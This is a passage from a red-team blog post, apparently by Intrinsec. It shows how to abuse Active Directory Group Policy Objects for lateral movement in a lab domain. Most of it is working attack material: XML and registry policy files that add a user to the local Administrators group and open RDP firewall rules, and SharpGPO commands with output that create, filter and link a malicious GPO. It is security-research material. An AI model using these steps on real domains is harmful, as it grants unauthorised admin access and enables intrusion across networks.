0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Groups.xml<\/mark><\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-sentidoweb-snippet\"><button class=\"sw-snippet-button\" data-label-copy=\"Copy\" data-label-copied=\"Copied\">Copy<\/button><code class=\"xml\">&lt;?xml version=\"1.0\" encoding=\"utf-8\"?>\n&lt;Groups clsid=\"{3125E937-EB16-4b4c-9934-544FC6D24D26}\">\n  &lt;Group clsid=\"{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}\" name=\"Administrators (built-in)\" image=\"2\" changed=\"2025-10-09 07:57:23\" uid=\"{D8EEFFBE-C971-41FC-BD90-881995CF321A}\">\n    &lt;Properties action=\"U\" newName=\"\" description=\"\" deleteAllUsers=\"0\" deleteAllGroups=\"0\" removeAccounts=\"0\" groupSid=\"S-1-5-32-544\" groupName=\"Administrators (built-in)\">\n      &lt;Members>\n        &lt;Member name=\"logres\\Arthur-Pendragon\" action=\"ADD\" sid=\"S-1-5-21-3558960056-1733047027-2537124806-1104\"\/>\n      &lt;\/Members>\n    &lt;\/Properties>\n  &lt;\/Group>\n&lt;\/Groups><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This XML file describes the addition we want to make within the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Administrators (built-in)<\/mark><\/code> group.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Registry.pol<\/mark><\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PReg\u0001   &#91; S O F T W A R E  P o l i c i e s  M i c r o s o f t  W i n d o w s F i r e w a l l   ; P o l i c y V e r s i o n   ; \u0004   ; \u0004   ; \u001d\u0002  ] &#91; S O F T W A R E  P o l i c i e s  M i c r o s o f t  W i n d o w s F i r e w a l l  F i r e w a l l R u l e s   ; R e m o t e D e s k t o p - S h a d o w - I n - T C P   ; \u0001   ; \u0152\u0001  ; v 2 . 2 8 | A c t i o n = A l l o w | A c t i v e = T R U E | D i r = I n | P r o t o c o l = 6 | A p p = % S y s t e m R o o t %  s y s t e m 3 2  R d p S a . e x e | N a m e = @ F i r e w a l l A P I . d l l , - 2 8 7 7 8 | D e s c = @ F i r e w a l l A P I . d l l , - 2 8 7 7 9 | E m b e d C t x t = @ F i r e w a l l A P I . d l l , - 2 8 7 5 2 | E d g e = T R U E | D e f e r = A p p |   ] &#91; S O F T W A R E  P o l i c i e s  M i c r o s o f t  W i n d o w s F i r e w a l l  F i r e w a l l R u l e s   ; R e m o t e D e s k t o p - U s e r M o d e - I n - U D P   ; \u0001   ; &nbsp;\u0001  ; v 2 . 2 8 | A c t i o n = A l l o w | A c t i v e = T R U E | D i r = I n | P r o t o c o l = 1 7 | L P o r t = 3 3 8 9 | A p p = % S y s t e m R o o t %  s y s t e m 3 2  s v c h o s t . e x e | S v c = t e r m s e r v i c e | N a m e = @ F i r e w a l l A P I . d l l , - 2 8 7 7 6 | D e s c = @ F i r e w a l l A P I . d l l , - 2 8 7 7 7 | E m b e d C t x t = @ F i r e w a l l A P I . d l l , - 2 8 7 5 2 |   ] &#91; S O F T W A R E  P o l i c i e s  M i c r o s o f t  W i n d o w s F i r e w a l l  F i r e w a l l R u l e s   ; R e m o t e D e s k t o p - U s e r M o d e - I n - T C P   ; \u0001   ; \u017e\u0001  ; v 2 . 2 8 | A c t i o n = A l l o w | A c t i v e = T R U E | D i r = I n | P r o t o c o l = 6 | L P o r t = 3 3 8 9 | A p p = % S y s t e m R o o t %  s y s t e m 3 2  s v c h o s t . e x e | S v c = t e r m s e r v i c e | N a m e = @ F i r e w a l l A P I . d l l , - 2 8 7 7 5 | D e s c = @ F i r e w a l l A P I . d l l , - 2 8 7 5 6 | E m b e d C t x t = @ F i r e w a l l A P I . d l l , - 2 8 7 5 2 |   ] <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">While it is not so easy to fully understand, we at least know that describes the firewall rules we configured.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GptTmpl.inf<\/mark><\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;Unicode]\nUnicode=yes\n&#91;Version]\nsignature=\"$CHICAGO$\"\nRevision=1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We now download these files and edit them as required. In our case, we will set up the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">C3-PO<\/mark><\/code> name and <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>SID<\/code> <\/mark>in the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Groups.xml<\/mark><\/code> file.<\/p>\n\n\n\n<pre class=\"wp-block-sentidoweb-snippet\"><button class=\"sw-snippet-button\" data-label-copy=\"Copy\" data-label-copied=\"Copied\">Copy<\/button><code class=\"xml\">&lt;?xml version=\"1.0\" encoding=\"utf-8\"?>\n&lt;Groups clsid=\"{3125E937-EB16-4b4c-9934-544FC6D24D26}\">&lt;Group clsid=\"{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}\" name=\"Administrators (built-in)\" image=\"2\" changed=\"2025-10-09 07:57:23\" uid=\"{D8EEFFBE-C971-41FC-BD90-881995CF321A}\">&lt;Properties action=\"U\" newName=\"\" description=\"\" deleteAllUsers=\"0\" deleteAllGroups=\"0\" removeAccounts=\"0\" groupSid=\"S-1-5-32-544\" groupName=\"Administrators (built-in)\">&lt;Members>&lt;Member name=\"galaxy\\C3-PO\" action=\"ADD\" sid=\"S-1-5-21-650846565-1940658604-1335123866-1105\"\/>&lt;\/Members>&lt;\/Properties>&lt;\/Group>\n&lt;\/Groups><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s come back to the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">galaxy.lan<\/mark><\/code> domain. The creation of a <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GPO <\/mark>and its configuration implies several actions:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Create the GPO<\/li>\n\n\n\n<li>Insert the configurations<\/li>\n\n\n\n<li>Configure the GPO<\/li>\n\n\n\n<li>Link the GPO<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">The <a href=\"https:\/\/github.com\/P-aLu\/SharpGPO\" target=\"_blank\" rel=\"noreferrer noopener\">SharpGPO<\/a> project fork will be used to perform those steps. If you prefer using Python, the <a href=\"https:\/\/github.com\/synacktiv\/GroupPolicyBackdoor\" target=\"_blank\" rel=\"noreferrer noopener\">GroupPolicyBackdoor<\/a> will make you happy.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To create a GPO, we will use the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>NewGPO<\/code> <\/mark>action:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; .SharpGPO.exe --Action NewGPO --GPOName \"A good GPO\" --Domain GALAXY.LAN --DomainController gal-korriban.galaxy.lan --Force\n&#91;*] Domain: GALAXY.LAN\n&#91;*] Domain Controller: gal-korriban.galaxy.lan\n&#91;*] Domain Distingushed Name: DC=GALAXY,DC=LAN\n&#91;*] Creating GPO with GUID {D7CFA964-B7BA-488F-9F05-475CA8028191}\n&#91;*] Creating LDAP GPO Entry\n&#91;*] Creating LDAP User and Machine Sub Entries\n&#91;*] Creating GPO Dir in SYSVOL\n&#91;*] Creating GPT.ini\n&#91;*] Creating User and Machine Sub Dirs\n&gt; dir \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}\"\n    Directory: \\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\nd----           10\/9\/2025 11:24 AM                Machine\nd----           10\/9\/2025 11:24 AM                User\n-a---           10\/9\/2025 11:24 AM             22 GPT.ini<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We will now create the required folders and upload our files:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; mkdir \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachinePreferences\"\n&gt; mkdir \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachinePreferencesGroups\"\n&gt; mkdir \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachineMicrosoft\"\n&gt; mkdir \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachineMicrosoftWindows NT\"\n&gt; mkdir \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachineMicrosoftWindows NTSecEdit\n&gt; copy .GptTmpl.inf \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachineMicrosoftWindows NTSecEdit\"\n&gt; copy .Registry.pol \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}Machine\"\n&gt; copy .Groups.xml \"\\galaxy.lansysvolgalaxy.lanPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}MachinePreferencesGroups\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">As previously mentioned, a GPO includes an Active Directory LDAP object. This LDAP object describes the target of the configurations (users or computers) and the kind of configurations that are set up. Basically, if the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">gPCMachineExtensionNames<\/mark><\/code> attribute exists, then domain assets know the GPO configures computers, the same applies for the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">gPCUserExtensionNames<\/mark><\/code> attribute for users. The content of those attributes are arrays that describe the type of configurations that are set up. As an example, the element <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{B05566AC-FE9C-4368-BE01-7A4CBB6CBA11}]<\/mark><\/code> means that firewall configurations are set up.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Then, we use the <code>SharpGPO<\/code> tool with the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">ConfigureGPO<\/mark><\/code> action to configure our GPO (to do it manually, you can use the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>LDAPAdmin<\/code> <\/mark>tool):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><code>&gt; .SharpGPO.exe --Action ConfigureGPO --GPOName \"A good GPO\" --Domain GALAXY.LAN --DomainController gal-korriban.galaxy.lan --GPOType Firewall --GPOTarget computers\n&#91;*] Domain: GALAXY.LAN\n&#91;*] Domain Controller: gal-korriban.galaxy.lan\n&#91;*] Domain Distingushed Name: DC=GALAXY,DC=LAN\n&#91;*] GPO Name: A good GPO\n&#91;*] GPO path: \\gal-korriban.galaxy.lanSYSVOLGALAXY.LANPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}GPT.ini\n&#91;+] versionNumber attribute changed successfully\n&#91;+] The version number in GPT.ini was increased successfully.\n&gt; .SharpGPO.exe --Action ConfigureGPO --GPOName \"A good GPO\" --Domain GALAXY.LAN --DomainController gal-korriban.galaxy.lan --GPOType Groups --GPOTarget computers\n&#91;*] Domain: GALAXY.LAN\n&#91;*] Domain Controller: gal-korriban.galaxy.lan\n&#91;*] Domain Distingushed Name: DC=GALAXY,DC=LAN\n&#91;*] GPO Name: A good GPO\n&#91;*] GPO path: \\gal-korriban.galaxy.lanSYSVOLGALAXY.LANPolicies{D7CFA964-B7BA-488F-9F05-475CA8028191}GPT.ini\n&#91;+] versionNumber attribute changed successfully\n&#91;+] The version number in GPT.ini was increased successfully.<\/code><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Before linking our GPO, we first need to set up some <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security filtering<\/mark><\/code>. As we only want <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH<\/mark><\/code> to access this GPO, we will focus on this computer. Once again, the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>SharpGPO<\/code> <\/mark>tool is used, with the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>NewSecurityFiltering<\/code> <\/mark>action:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; .SharpGPO.exe --Action NewSecurityFiltering --GPOName \"A good GPO\" --Domain GALAXY.LAN --DomainController gal-korriban.galaxy.lan --DomainComputer \"GAL-IOKATH\"\n&#91;*] Domain: GALAXY.LAN\n&#91;*] Domain Controller: gal-korriban.galaxy.lan\n&#91;*] Domain Distingushed Name: DC=GALAXY,DC=LAN\n&#91;*] GUID of the GPO 'A good GPO': {D7CFA964-B7BA-488F-9F05-475CA8028191}\n&#91;*] Creating Security Filtering\n&#91;*] GPO GUID: {D7CFA964-B7BA-488F-9F05-475CA8028191}\n&#91;*] SID: S-1-5-21-650846565-1940658604-1335123866-1128\n&#91;*] Security Filtering created sucessfully<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Finally, we link the GPO to any OU containing our target. The best way to do so is still to link the GPO to the smallest OU containing our target. The <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>NewGPLink<\/code> <\/mark>action proceed this task:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; .SharpGPO.exe --Action NewGPLink --GPOName \"A good GPO\" --Domain GALAXY.LAN --DomainController gal-korriban.galaxy.lan --DN \"OU=Hard, OU=Workstations, OU=Machines, DC=galaxy, DC=lan\"\n&#91;*] Domain: GALAXY.LAN\n&#91;*] Domain Controller: gal-korriban.galaxy.lan\n&#91;*] Domain Distingushed Name: DC=GALAXY,DC=LAN\n&#91;*] GUID of the GPO 'A good GPO': {D7CFA964-B7BA-488F-9F05-475CA8028191}\n&#91;*] Creating a gPLink: OU=Hard, OU=Workstations, OU=Machines, DC=galaxy, DC=lan =&gt; GPO {D7CFA964-B7BA-488F-9F05-475CA8028191}\n&#91;*] gPLink: &#91;LDAP:\/\/cn={7A8053BC-AF30-4FBF-89A6-740DDDDC703B},cn=policies,cn=system,DC=galaxy,DC=lan;0]&#91;LDAP:\/\/cn={2D71192E-A14C-441B-9A8A-79330AB2C229},cn=policies,cn=system,DC=galaxy,DC=lan;0]\n&#91;*] gPLink was successfully created\n&#91;*] gPLink after created: &#91;LDAP:\/\/CN={D7CFA964-B7BA-488F-9F05-475CA8028191},CN=Policies,CN=System,DC=GALAXY,DC=LAN;0]&#91;LDAP:\/\/cn={7A8053BC-AF30-4FBF-89A6-740DDDDC703B},cn=policies,cn=system,DC=galaxy,DC=lan;0]&#91;LDAP:\/\/cn={2D71192E-A14C-441B-9A8A-79330AB2C229},cn=policies,cn=system,DC=galaxy,DC=lan;0]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">All those steps can be done using the GUI if you manage to obtain a graphical access.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s now look at the result. Reviewing the report obtained using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>gpresult<\/code> <\/mark>command on the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH<\/mark><\/code> computer, we can first see the extensions configured by our <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">A good GPO<\/mark><\/code> GPO. We can also observe the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security Filter<\/mark><\/code> and the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Link Location<\/mark><\/code>:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"992\" height=\"287\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-26.png\" alt=\"\" class=\"wp-image-230317\" title=\" =496x143.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-26.png 992w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-26-300x87.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-26-768x222.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-26-18x5.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-26-650x188.png 650w\" sizes=\"(max-width: 992px) 100vw, 992px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">If we look more in details, we can finally see our group configuration and firewall rules:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"978\" height=\"618\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-29.png\" alt=\"\" class=\"wp-image-230320\" title=\" =489x309\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-29.png 978w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-29-300x190.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-29-768x485.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-29-18x12.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-29-650x411.png 650w\" sizes=\"(max-width: 978px) 100vw, 978px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"448\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-28.png\" alt=\"\" class=\"wp-image-230319\" title=\" =490.5x224\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-28.png 981w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-28-300x137.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-28-768x351.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-28-18x8.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-28-650x297.png 650w\" sizes=\"(max-width: 981px) 100vw, 981px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">By doing it manually, we could add more settings and customize further, but this would require spending additional time on the process.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"all-in-one-tools---lazy-time\">All in one tools &#8211; lazy time<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/synacktiv\/GroupPolicyBackdoor\" target=\"_blank\" rel=\"noreferrer noopener\">GroupPolicyBackdoor<\/a> and <a href=\"https:\/\/github.com\/FSecureLABS\/SharpGPOAbuse\" target=\"_blank\" rel=\"noreferrer noopener\">SharpGPOAbuse<\/a> can be used to do most of the work. Nevertheless, neither tool manages the use of the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security Filtering<\/mark><\/code> at the time of writing this blogpost.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To understand how these tools work, we highly suggest reading their Github project and Wiki.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion\">Conclusion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This blogpost explained how GPOs work and how filters can be applied in order to restrict their impact.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The example demonstrated how to proceed by creating a GPO, but these actions can also be performed using an existing GPO.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Finally, the detection of such actions has not been addressed in this article, but could be the subject of future research.<\/p>\n\n\n<div style=\"background-color:#f8f8f8\" class=\"wp-block-post-author has-background\"><div class=\"wp-block-post-author__avatar\"><img alt='' src='https:\/\/secure.gravatar.com\/avatar\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&#038;d=retro&#038;r=g' srcset='https:\/\/secure.gravatar.com\/avatar\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=192&#038;d=retro&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' \/><\/div><div class=\"wp-block-post-author__content\"><p class=\"wp-block-post-author__name\">Paul Saladin (P-alu)<\/p><p class=\"wp-block-post-author__bio\">Red Team Operator @Intrinsec<\/p><\/div><\/div>\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Offensive security \u2013 TL;DR: The use of GPOs to perform lateral movement has become more common during recent assessments. One key aspect of this process is targeting. You don&#039;t want to deploy your configuration on a high number of assets without control. Several methods exist: Security Filtering, Item-level targeting and script based targeting.<\/p>","protected":false},"author":19,"featured_media":230350,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,18,14],"tags":[80,186],"class_list":["post-230278","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-recherche-et-developpement","category-red-teaming","category-test-dintrusion","tag-active-directory","tag-red-team"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.9 (Yoast SEO v28.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Hide the threat - GPO lateral movement - INTRINSEC<\/title>\n<meta name=\"description\" content=\"Learn how to perform and understand lateral mouvement though GPO mechanism during pentest and red team assessments.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hide the threat - GPO lateral movement\" \/>\n<meta property=\"og:description\" content=\"Learn how to perform and understand lateral mouvement though GPO mechanism during pentest and red team assessments.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/\" \/>\n<meta property=\"og:site_name\" content=\"INTRINSEC\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-25T13:06:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-25T13:06:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/2025-10-21_11-49-36.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1014\" \/>\n\t<meta property=\"og:image:height\" content=\"1010\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Paul Saladin (P-alu)\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Intrinsec\" \/>\n<meta name=\"twitter:site\" content=\"@Intrinsec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Paul Saladin (P-alu)\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/\"},\"author\":{\"name\":\"Paul Saladin (P-alu)\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eba80a0167fdf3502c18343d08948ffa\"},\"headline\":\"Hide the threat &#8211; GPO lateral movement\",\"datePublished\":\"2025-11-25T13:06:27+00:00\",\"dateModified\":\"2025-11-25T13:06:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/\"},\"wordCount\":1597,\"publisher\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/2025-10-21_11-49-36.png\",\"keywords\":[\"Active Directory\",\"Red Team\"],\"articleSection\":[\"Recherche et D\u00e9veloppement\",\"Red Teaming\",\"Test d'intrusion\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/\",\"name\":\"Hide the threat - GPO lateral movement - INTRINSEC\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/2025-10-21_11-49-36.png\",\"datePublished\":\"2025-11-25T13:06:27+00:00\",\"dateModified\":\"2025-11-25T13:06:29+00:00\",\"description\":\"Learn how to perform and understand lateral mouvement though GPO mechanism during pentest and red team assessments.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/2025-10-21_11-49-36.png\",\"contentUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/2025-10-21_11-49-36.png\",\"width\":1014,\"height\":1010},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/hide-the-threat-gpo-lateral-movement\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.intrinsec.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Hide the threat &#8211; GPO lateral movement\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#website\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/\",\"name\":\"INTRINSEC\",\"description\":\"Notre m\u00e9tier , Prot\u00e9ger le v\u00f4tre\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.intrinsec.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#organization\",\"name\":\"INTRINSEC\",\"alternateName\":\"ISEC\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/libellule.png\",\"contentUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/libellule.png\",\"width\":1322,\"height\":1322,\"caption\":\"INTRINSEC\"},\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/Intrinsec\",\"https:\\\/\\\/fr.linkedin.com\\\/company\\\/intrinsec\",\